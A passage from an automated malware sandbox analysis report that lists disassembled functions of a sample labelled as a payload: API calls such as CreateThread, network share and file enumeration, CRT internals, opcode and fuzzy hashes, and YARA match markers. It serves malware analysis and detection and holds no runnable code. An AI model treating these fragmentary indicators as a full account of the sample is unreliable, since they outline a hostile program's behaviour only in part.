                                                                                                                                                                        • Instruction Fuzzy Hash: 59F0D17540020DA7CF14BA98DC56EFEBBE8DB00751F0044A9FC5496182DFF09A8482D4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BA3B0A
                                                                                                                                                                          • Part of subcall function 00BB3B4C: _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                                                        • API String ID: 657562460-3788999226
                                                                                                                                                                        • Opcode ID: 957c0edda29036527f5c3689eb1bceb9a35c09b1df98f9ba4227239110a6cab8
                                                                                                                                                                        • Instruction ID: c2efeff570e1dc674123b409b4624610b4c8742d0ca99a071af8d1722a5cebe9
                                                                                                                                                                        • Opcode Fuzzy Hash: 957c0edda29036527f5c3689eb1bceb9a35c09b1df98f9ba4227239110a6cab8
                                                                                                                                                                        • Instruction Fuzzy Hash: FE01D472100B06ABD7208F9CC49169AF7E9EF81B24F20853EFA5587740F7B1E944C790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BE4AE0: GetStdHandle.KERNEL32(000000F4,00BE4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00BE480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00BE1D37,00000000,00B9CDAE,00000001,00000001), ref: 00BE4AFA
                                                                                                                                                                          • Part of subcall function 00BE4AE0: GetFileType.KERNEL32(00000000), ref: 00BE4B05
                                                                                                                                                                          • Part of subcall function 00BE4AE0: __vfwprintf_p.LIBCMT ref: 00BE4B27
                                                                                                                                                                        • _raise.LIBCMT ref: 00BE4C18
                                                                                                                                                                          • Part of subcall function 00BBA12E: __getptd_noexit.LIBCMT ref: 00BBA16B
                                                                                                                                                                          • Part of subcall function 00BB7CEC: _doexit.LIBCMT ref: 00BB7CF6
                                                                                                                                                                        Strings
                                                                                                                                                                        • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00BE4C0C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                                                                                        • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                                                                                        • API String ID: 2149077303-4210838268
                                                                                                                                                                        • Opcode ID: 1e8e5b8989cc7102df7a9596ed854b2057d8a26030c4c3f155b4546bcb6db91b
                                                                                                                                                                        • Instruction ID: 7176cdfb481cbf6daffd2a0df2d1cd19ca50027f795d2d5eb8b00e9b77c986e2
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e8e5b8989cc7102df7a9596ed854b2057d8a26030c4c3f155b4546bcb6db91b
                                                                                                                                                                        • Instruction Fuzzy Hash: C1D09E795886007FD9016794AD07A6E7B91AF84714F408868F69A140A2DBB29520AA57
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsstr$Find$CloseExtensionFileNextPath
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2799698630-0
                                                                                                                                                                        • Opcode ID: 83043c3accdbdfd0e544b2ef3e49d8039d793426b50ff25c5fd6b42550566f30
                                                                                                                                                                        • Instruction ID: 8ce4c6e99a40d6d9bbdebec06af60741e2184140478b1e438ab82c652d12a3e6
                                                                                                                                                                        • Opcode Fuzzy Hash: 83043c3accdbdfd0e544b2ef3e49d8039d793426b50ff25c5fd6b42550566f30
                                                                                                                                                                        • Instruction Fuzzy Hash: 815159719142598AEF20EF60CC457EEB6F6FF21318F1041F9D409A6251EB769A84CF52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        • __lock_file.LIBCMT ref: 00BB3A7D
                                                                                                                                                                          • Part of subcall function 00BB0E53: __lock.LIBCMT ref: 00BB0E76
                                                                                                                                                                        • __fclose_nolock.LIBCMT ref: 00BB3A88
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2800547568-0
                                                                                                                                                                        • Opcode ID: 03672ffc58032528241e545efffb98c81969decb65c99e8810b0519ed4854f34
                                                                                                                                                                        • Instruction ID: cecc3c6b9f288efb7b5735e72223b5473dda6b92cfe60c9609d9bf5b22759e1f
                                                                                                                                                                        • Opcode Fuzzy Hash: 03672ffc58032528241e545efffb98c81969decb65c99e8810b0519ed4854f34
                                                                                                                                                                        • Instruction Fuzzy Hash: D9F09031811704ABD720BFA988027FE6AD46F00B34F2582C8E4A4AA1C1CBFCDB419B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock.LIBCMT ref: 00BBFB7B
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __mtinitlocknum.LIBCMT ref: 00BB8B09
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __amsg_exit.LIBCMT ref: 00BB8B15
                                                                                                                                                                          • Part of subcall function 00BB8AF7: EnterCriticalSection.KERNEL32(00000000,?,00BB50D7,0000000D), ref: 00BB8B22
                                                                                                                                                                        • __tzset_nolock.LIBCMT ref: 00BBFB8E
                                                                                                                                                                          • Part of subcall function 00BBFE47: __lock.LIBCMT ref: 00BBFE6C
                                                                                                                                                                          • Part of subcall function 00BBFE47: ____lc_codepage_func.LIBCMT ref: 00BBFEB3
                                                                                                                                                                          • Part of subcall function 00BBFE47: __getenv_helper_nolock.LIBCMT ref: 00BBFED4
                                                                                                                                                                          • Part of subcall function 00BBFE47: _free.LIBCMT ref: 00BBFF07
                                                                                                                                                                          • Part of subcall function 00BBFE47: _strlen.LIBCMT ref: 00BBFF0E
                                                                                                                                                                          • Part of subcall function 00BBFE47: __malloc_crt.LIBCMT ref: 00BBFF15
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1282695788-0
                                                                                                                                                                        • Opcode ID: 477e102157aa38582eb5b0c8c1282964bafa1871ba6fb5c25b8296c0b912f11a
                                                                                                                                                                        • Instruction ID: 8a9fabcec1916f787aff6dc2599c69cca565b5e7f89d4f9a4c6bdde87e30f2c9
                                                                                                                                                                        • Opcode Fuzzy Hash: 477e102157aa38582eb5b0c8c1282964bafa1871ba6fb5c25b8296c0b912f11a
                                                                                                                                                                        • Instruction Fuzzy Hash: 28E0EC35451246DBEB30ABB0DD1A7FC72E4EB1132AF1591A5E420161D28FF84584CA22
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00BB7B11
                                                                                                                                                                          • Part of subcall function 00BB7AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00BB7B16,00000000,?,00BB8BCA,000000FF,0000001E,00C97BD0,00000008,00BB8B0E,00000000,00000000), ref: 00BB7AE6
                                                                                                                                                                          • Part of subcall function 00BB7AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00BB7AF8
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00BB7B1A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2427264223-0
                                                                                                                                                                        • Opcode ID: d33d1a5bae039d63a13643e5c5c2427e5b1e23270d4facc7eda1bdd08a02e43b
                                                                                                                                                                        • Instruction ID: 4c59a99a3446a3d892a3082827e374ae6e760a9b83a1f8fd2dd34cab06dd8937
                                                                                                                                                                        • Opcode Fuzzy Hash: d33d1a5bae039d63a13643e5c5c2427e5b1e23270d4facc7eda1bdd08a02e43b
                                                                                                                                                                        • Instruction Fuzzy Hash: 75B09230005208BFCB052F51DC0A9AD3F69EB40391F008020F91808032EFB2AA919AC0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BA18DD
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00BA18E9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFreeHandleVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2443081362-0
                                                                                                                                                                        • Opcode ID: b84e9d67b229e477b8aaed5dfde3a630a71fbb14a95e26a049c6130ececd8c0f
                                                                                                                                                                        • Instruction ID: 166fb3c74ff0a65c0dab183037262a86a5833e96e193cb90deb6f18f576fa995
                                                                                                                                                                        • Opcode Fuzzy Hash: b84e9d67b229e477b8aaed5dfde3a630a71fbb14a95e26a049c6130ececd8c0f
                                                                                                                                                                        • Instruction Fuzzy Hash: E8E08636A046049BC720CB9CED8079DB3B4FB85721F240369D819732D047356D018944
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BA69DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 120817956-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BA67E6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 120817956-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BA65C5
                                                                                                                                                                          • Part of subcall function 00BB3B4C: _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 657562460-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BA3C40: _memset.LIBCMT ref: 00BA3C83
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,?,00000000,00000000,?), ref: 00BA28AA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2800726579-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB3B4C: _malloc.LIBCMT ref: 00BB3B64
                                                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00BACC83
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 657562460-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 00BAFA25
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                        • Opcode ID: 85f7f1c3e2bef22039736c027591e974c473bbb4d8cce32a132417dfec5917d4
                                                                                                                                                                        • Instruction ID: dad82621533c4bbe90f1fde5efdfbae29baee171cdc1bcb2571da887bc4f704f
                                                                                                                                                                        • Opcode Fuzzy Hash: 85f7f1c3e2bef22039736c027591e974c473bbb4d8cce32a132417dfec5917d4
                                                                                                                                                                        • Instruction Fuzzy Hash: CAD0A7323483157BE7140A99AC07FDB7ACCCF15B10F00403AB609EA1C0D5E1F8108698
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BA0BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00BA0C12
                                                                                                                                                                        • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 00BAFDA4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumMessageOpenSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1835186980-0
                                                                                                                                                                        • Opcode ID: 9394563ef58f0b4d880cfebef972ae232fd53b0cc53b53c21df6773ceeef2b8b
                                                                                                                                                                        • Instruction ID: 3e3e8047d8366f2e909fdd08bf9de6576972f7a2c1ba2931fc541391d96295f9
                                                                                                                                                                        • Opcode Fuzzy Hash: 9394563ef58f0b4d880cfebef972ae232fd53b0cc53b53c21df6773ceeef2b8b
                                                                                                                                                                        • Instruction Fuzzy Hash: 53E0C2311043046AD3209764CC01B86BBC49F19724F00C819E28A6B981C5A1B00486A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00CB9230), ref: 00BAFDD6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                        • Opcode ID: 14c0f4e45492ea2745eaf15de6a77d66284464c75ad4ffc1e1e21a84a719c4fa
                                                                                                                                                                        • Instruction ID: b397771f723e64311d0bd019da4c21f3a9d889c1a590afcd98812ebf83ff5ad5
                                                                                                                                                                        • Opcode Fuzzy Hash: 14c0f4e45492ea2745eaf15de6a77d66284464c75ad4ffc1e1e21a84a719c4fa
                                                                                                                                                                        • Instruction Fuzzy Hash: 75D0C97178D3067BEB090BA9AC47F9E3AD8D719B01F404135B705E91E0DAB1A4609A5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __fsopen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3646066109-0
                                                                                                                                                                        • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                                        • Instruction ID: 0d02b5997b48ce867caf1fc4c6dd5cb798e772651c05bdfbca719ad31e37a990
                                                                                                                                                                        • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                                        • Instruction Fuzzy Hash: E0B0927244020C77CF012E86EC02AA93B599B50760F448060FB0C18161E6B7E6649689
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __wfsopen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 197181222-0
                                                                                                                                                                        • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                                        • Instruction ID: ac7c84116f89d3da8396ad0250e60a4c0b422cc111cddd9408a4c8438f9ef032
                                                                                                                                                                        • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                                        • Instruction Fuzzy Hash: 21B0927244020C77CE012A86EC02A993B699B456A0F808060FB0C18161A6B3A6A09A89
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _doexit.LIBCMT ref: 00BB7F47
                                                                                                                                                                          • Part of subcall function 00BB7E0E: __lock.LIBCMT ref: 00BB7E1C
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(00C97B08,0000001C,00BB7CFB,00000000,00000001,00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7E5B
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7E6C
                                                                                                                                                                          • Part of subcall function 00BB7E0E: EncodePointer.KERNEL32(00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7E85
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(-00000004,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7E95
                                                                                                                                                                          • Part of subcall function 00BB7E0E: EncodePointer.KERNEL32(00000000,?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7E9B
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7EB1
                                                                                                                                                                          • Part of subcall function 00BB7E0E: DecodePointer.KERNEL32(?,00BB7C49,000000FF,?,00BB8B1A,00000011,00000000,?,00BB50D7,0000000D), ref: 00BB7EBC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
